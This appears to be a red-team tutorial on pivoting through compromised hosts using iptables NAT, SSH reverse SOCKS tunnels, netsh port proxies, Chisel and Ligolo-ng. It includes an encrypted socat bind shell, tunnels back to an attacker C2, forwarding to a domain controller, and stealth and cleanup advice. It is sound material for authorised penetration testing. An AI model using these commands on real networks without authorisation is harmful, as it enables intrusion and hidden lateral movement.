Tunneling traffic is the fundamental dark art of the Red Teamer. It is the ability to create a “wormhole” through restricted network segments, turning a compromised bastion host into a gateway for your entire arsenal.

In this guide, we are going to move beyond simple ssh -D. We will explore the mechanics of network address translation with iptables, the full capabilities of modern OpenSSH (including Reverse SOCKS), the built-in “Living off the Land” pivoting tools on Windows like netsh, and modern compiled tools like Chisel and Ligolo-ng that have revolutionized pivoting.

1. Iptables Port Redirection (Linux)

Iptables is the kernel-level firewall and packet manipulation tool for Linux. For a red teamer, its nat table is invaluable for creating transparent redirects that don’t rely on user-land processes like socat.

The Pre-Requisite: IP Forwarding

Before iptables can route packets between interfaces, the kernel must be allowed to forward IPv4 traffic.

1
2
3
4
5
6
7
8

# Check current status (0=disabled, 1=enabled)
cat /proc/sys/net/ipv4/ip_forward

# Enable on the fly
echo 1 > /proc/sys/net/ipv4/ip_forward

# Enable persistently (requires root)
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf && sysctl -p

Scenario: The Hidden Web Server

You compromised a Linux Jump Box (10.0.0.5). You want your attacker machine (outside the network) to access an internal web server (10.0.0.50:80) by connecting to the Jump Box on port 8080.

Step 1: Destination NAT (DNAT)

Route incoming packets on 8080 to the internal target.

1

iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 10.0.0.50:80

Step 2: Source NAT (SNAT / Masquerade)

This is the step everyone forgets. When the packet reaches 10.0.0.50, the source IP is still your external attacker IP. The internal server (10.0.0.50) likely has no route back to the internet. You must rewrite the source IP to be the Jump Box’s IP (10.0.0.5), so the reply comes back to the Jump Box (which then sends it to you).

1
2
3
4
5

# Using MASQUERADE (dynamic IP)
iptables -t nat -A POSTROUTING -j MASQUERADE

# Or specific SNAT (static IP, slightly faster)
iptables -t nat -A POSTROUTING -j SNAT --to-source 10.0.0.5

2. SSH Tunneling: The Swiss Army Protocol

SSH is almost always allowed outbound. It is encrypted, reliable, and versatile.

The Classics: -L, -R, -D

  • Local Forward (-L 8080:target:80): “Open a port on my machine (8080) that tunnels to target:80 from the SSH server.”
  • Remote Forward (-R 8080:target:80): “Open a port on the SSH server (8080) that tunnels to target:80 from my machine / localhost.”
  • Dynamic Forward (-D 1080): “Open a SOCKS proxy on my machine.”

The New School: Reverse Dynamic SOCKS (-R)

In modern OpenSSH client/server versions (7.6+), you can create a Reverse SOCKS Proxy. This allows you to SSH from a restricted internal network out to your C2, and open a SOCKS port on your C2 that tunnels back into the internal network.

Scenario: You are on a restricted internal host (10.10.10.5) that can SSH out, but you cannot SSH in.

Command on Internal Host:

1
2
3

# Connect OUT to attacker. Open port 1080 on attacker.
# traffic to attacker:1080 -> Internal Network
ssh -R 1080 user@attacker-c2

Result: On your C2 server, proxychains pointed at 127.0.0.1:1080 gives you access to the 10.10.10.x network.

The Force Multiplier: ProxyJump (-J)

Stop chaining manual SSH commands (ssh host1, then ssh host2). Use -J.

1
2

# Jump through bastion1, then bastion2, to reach target
ssh -J user@bastion1,user@bastion2 user@target

SCP with Jump:

1

scp -o ProxyJump=user@bastion1 file.txt user@target:/tmp/

SSHuttle: The Poor Man’s VPN

SOCKS proxies break tools that don’t support proxies (or Go binaries, or UDP). sshuttle creates a transparent VPN over SSH by rewriting local routing tables.

1
2

# Route all traffic to 10.0.0.0/24 through the pivot host
sshuttle -r user@pivot-host 10.0.0.0/24

3. Netsh Port Proxies (Windows Living off the Land)

When you land on a Windows box, you often don’t have SSH. netsh interface portproxy is the built-in Windows alternative to iptables DNAT.

Persistent Forwarding

Scenario: Forward port 4455 on the compromised Windows host to 445 on the Domain Controller (192.168.1.10).

1

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.10

Now, from your attacker machine, connecting to CompromisedWindows:4455 connects you to DC:445.

Use Cases:

  1. Bypassing Firewall Rules: If the firewall allows inbound 443 but blocks 3389, forward 443 -> 3389 (assuming IIS isn’t running).
  2. IPv6 Bypass: v6tov4 allows you to listen on IPv6 (which is often less filtered) and forward to an IPv4 internal address.

Cleanup (Crucial OpSec)

netsh changes are persistent across reboots. They write to the Registry.

1
2
3
4
5

# View active
netsh interface portproxy show all

# Delete
netsh interface portproxy delete v4tov4 listenport=4455 listenaddress=0.0.0.0

Registry Artifact: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4

4. Socat: The Universal Connector

socat is “cat” for sockets. It connects anything to anything.

Simple TCP Redirector

1

socat TCP4-LISTEN:8080,fork TCP4:10.0.0.50:80

Encrypted Bind Shell (Poor Man’s SSL Tunnel)

Listener (Target):

1
2
3
4

# Generate cert
openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key
# Listen
socat OPENSSL-LISTEN:4443,cert=cert.pem,key=cert.key,verify=0 EXEC:/bin/bash

Connector (Attacker):

1

socat - OPENSSL:target-ip:4443,verify=0

5. Modern Pivoting: Chisel and Ligolo-ng

While SSH and netsh are great because they are built-in, dedicated red team tools offer superior performance and capabilities.

Chisel: HTTP/S Tunneling

Chisel creates a fast TCP/UDP tunnel over HTTP, secured via SSH. It is a single binary that works on Linux, Windows, and Mac.

Server (Attacker):

1
2

# Start server, listening on port 8000, allowing reverse tunnels
chisel server -p 8000 --reverse

Client (Victim):

1
2

# Connect to attacker, open a Reverse SOCKS proxy on attacker's port 1080
chisel client 10.10.14.5:8000 R:1080:socks

This effectively gives you the same power as ssh -R, but over HTTP (easier to smuggle through proxies) and without needing SSH keys.

Ligolo-ng: TUN Interface Pivoting

Ligolo-ng is the new king of pivoting. Instead of SOCKS proxies (which break nmap SYN scans and UDP), Ligolo creates a true VPN interface (tun) on your attacker machine.

  1. Setup: You run the proxy on your attacker machine.
  2. Agent: You run the agent on the victim.
  3. Result: You get a network interface (e.g., ligolo0) on your machine. You can ping, run nmap -sS, and use tools natively against the internal network without proxychains.

Attacker:

1

sudo ./proxy -selfcert

Victim:

1

agent.exe -connect 10.10.14.5:11601 -ignore-cert

Attacker Interface:

1
2
3
4
5

# In ligolo session
session 1
start
# On host
sudo ip route add 10.10.10.0/24 dev ligolo0

6. OpSec and Forensic Considerations

Tunneling is noisy if you know where to look.

  1. Network Artifacts: Long-lived TCP connections (SSH/Chisel) with high throughput.
  2. Process List: ssh -R ... commands are visible in ps aux unless you define them in ~/.ssh/config.
  3. Windows Registry: As mentioned, netsh leaves keys behind.
  4. Loopback Traffic: ssh -D creates a listener on localhost. Malware scanners look for processes listening on ephemeral ports.

Recommendation: For high-stakes engagements, prefer Ligolo-ng for its stealth and capability to handle non-TCP traffic, or use Chisel over HTTPS with a valid certificate to blend in with web traffic.

Conclusion

Mastering the maze of network redirection is what separates entry-level testers from seasoned red teamers. It turns a flat network map into a 3D chess board.

Whether you use the kernel-level power of iptables, the ubiquity of SSH, or the dedicated power of Ligolo-ng, verify your routes, check your return paths, and always clean up your bridges behind you.

Happy pivoting!

References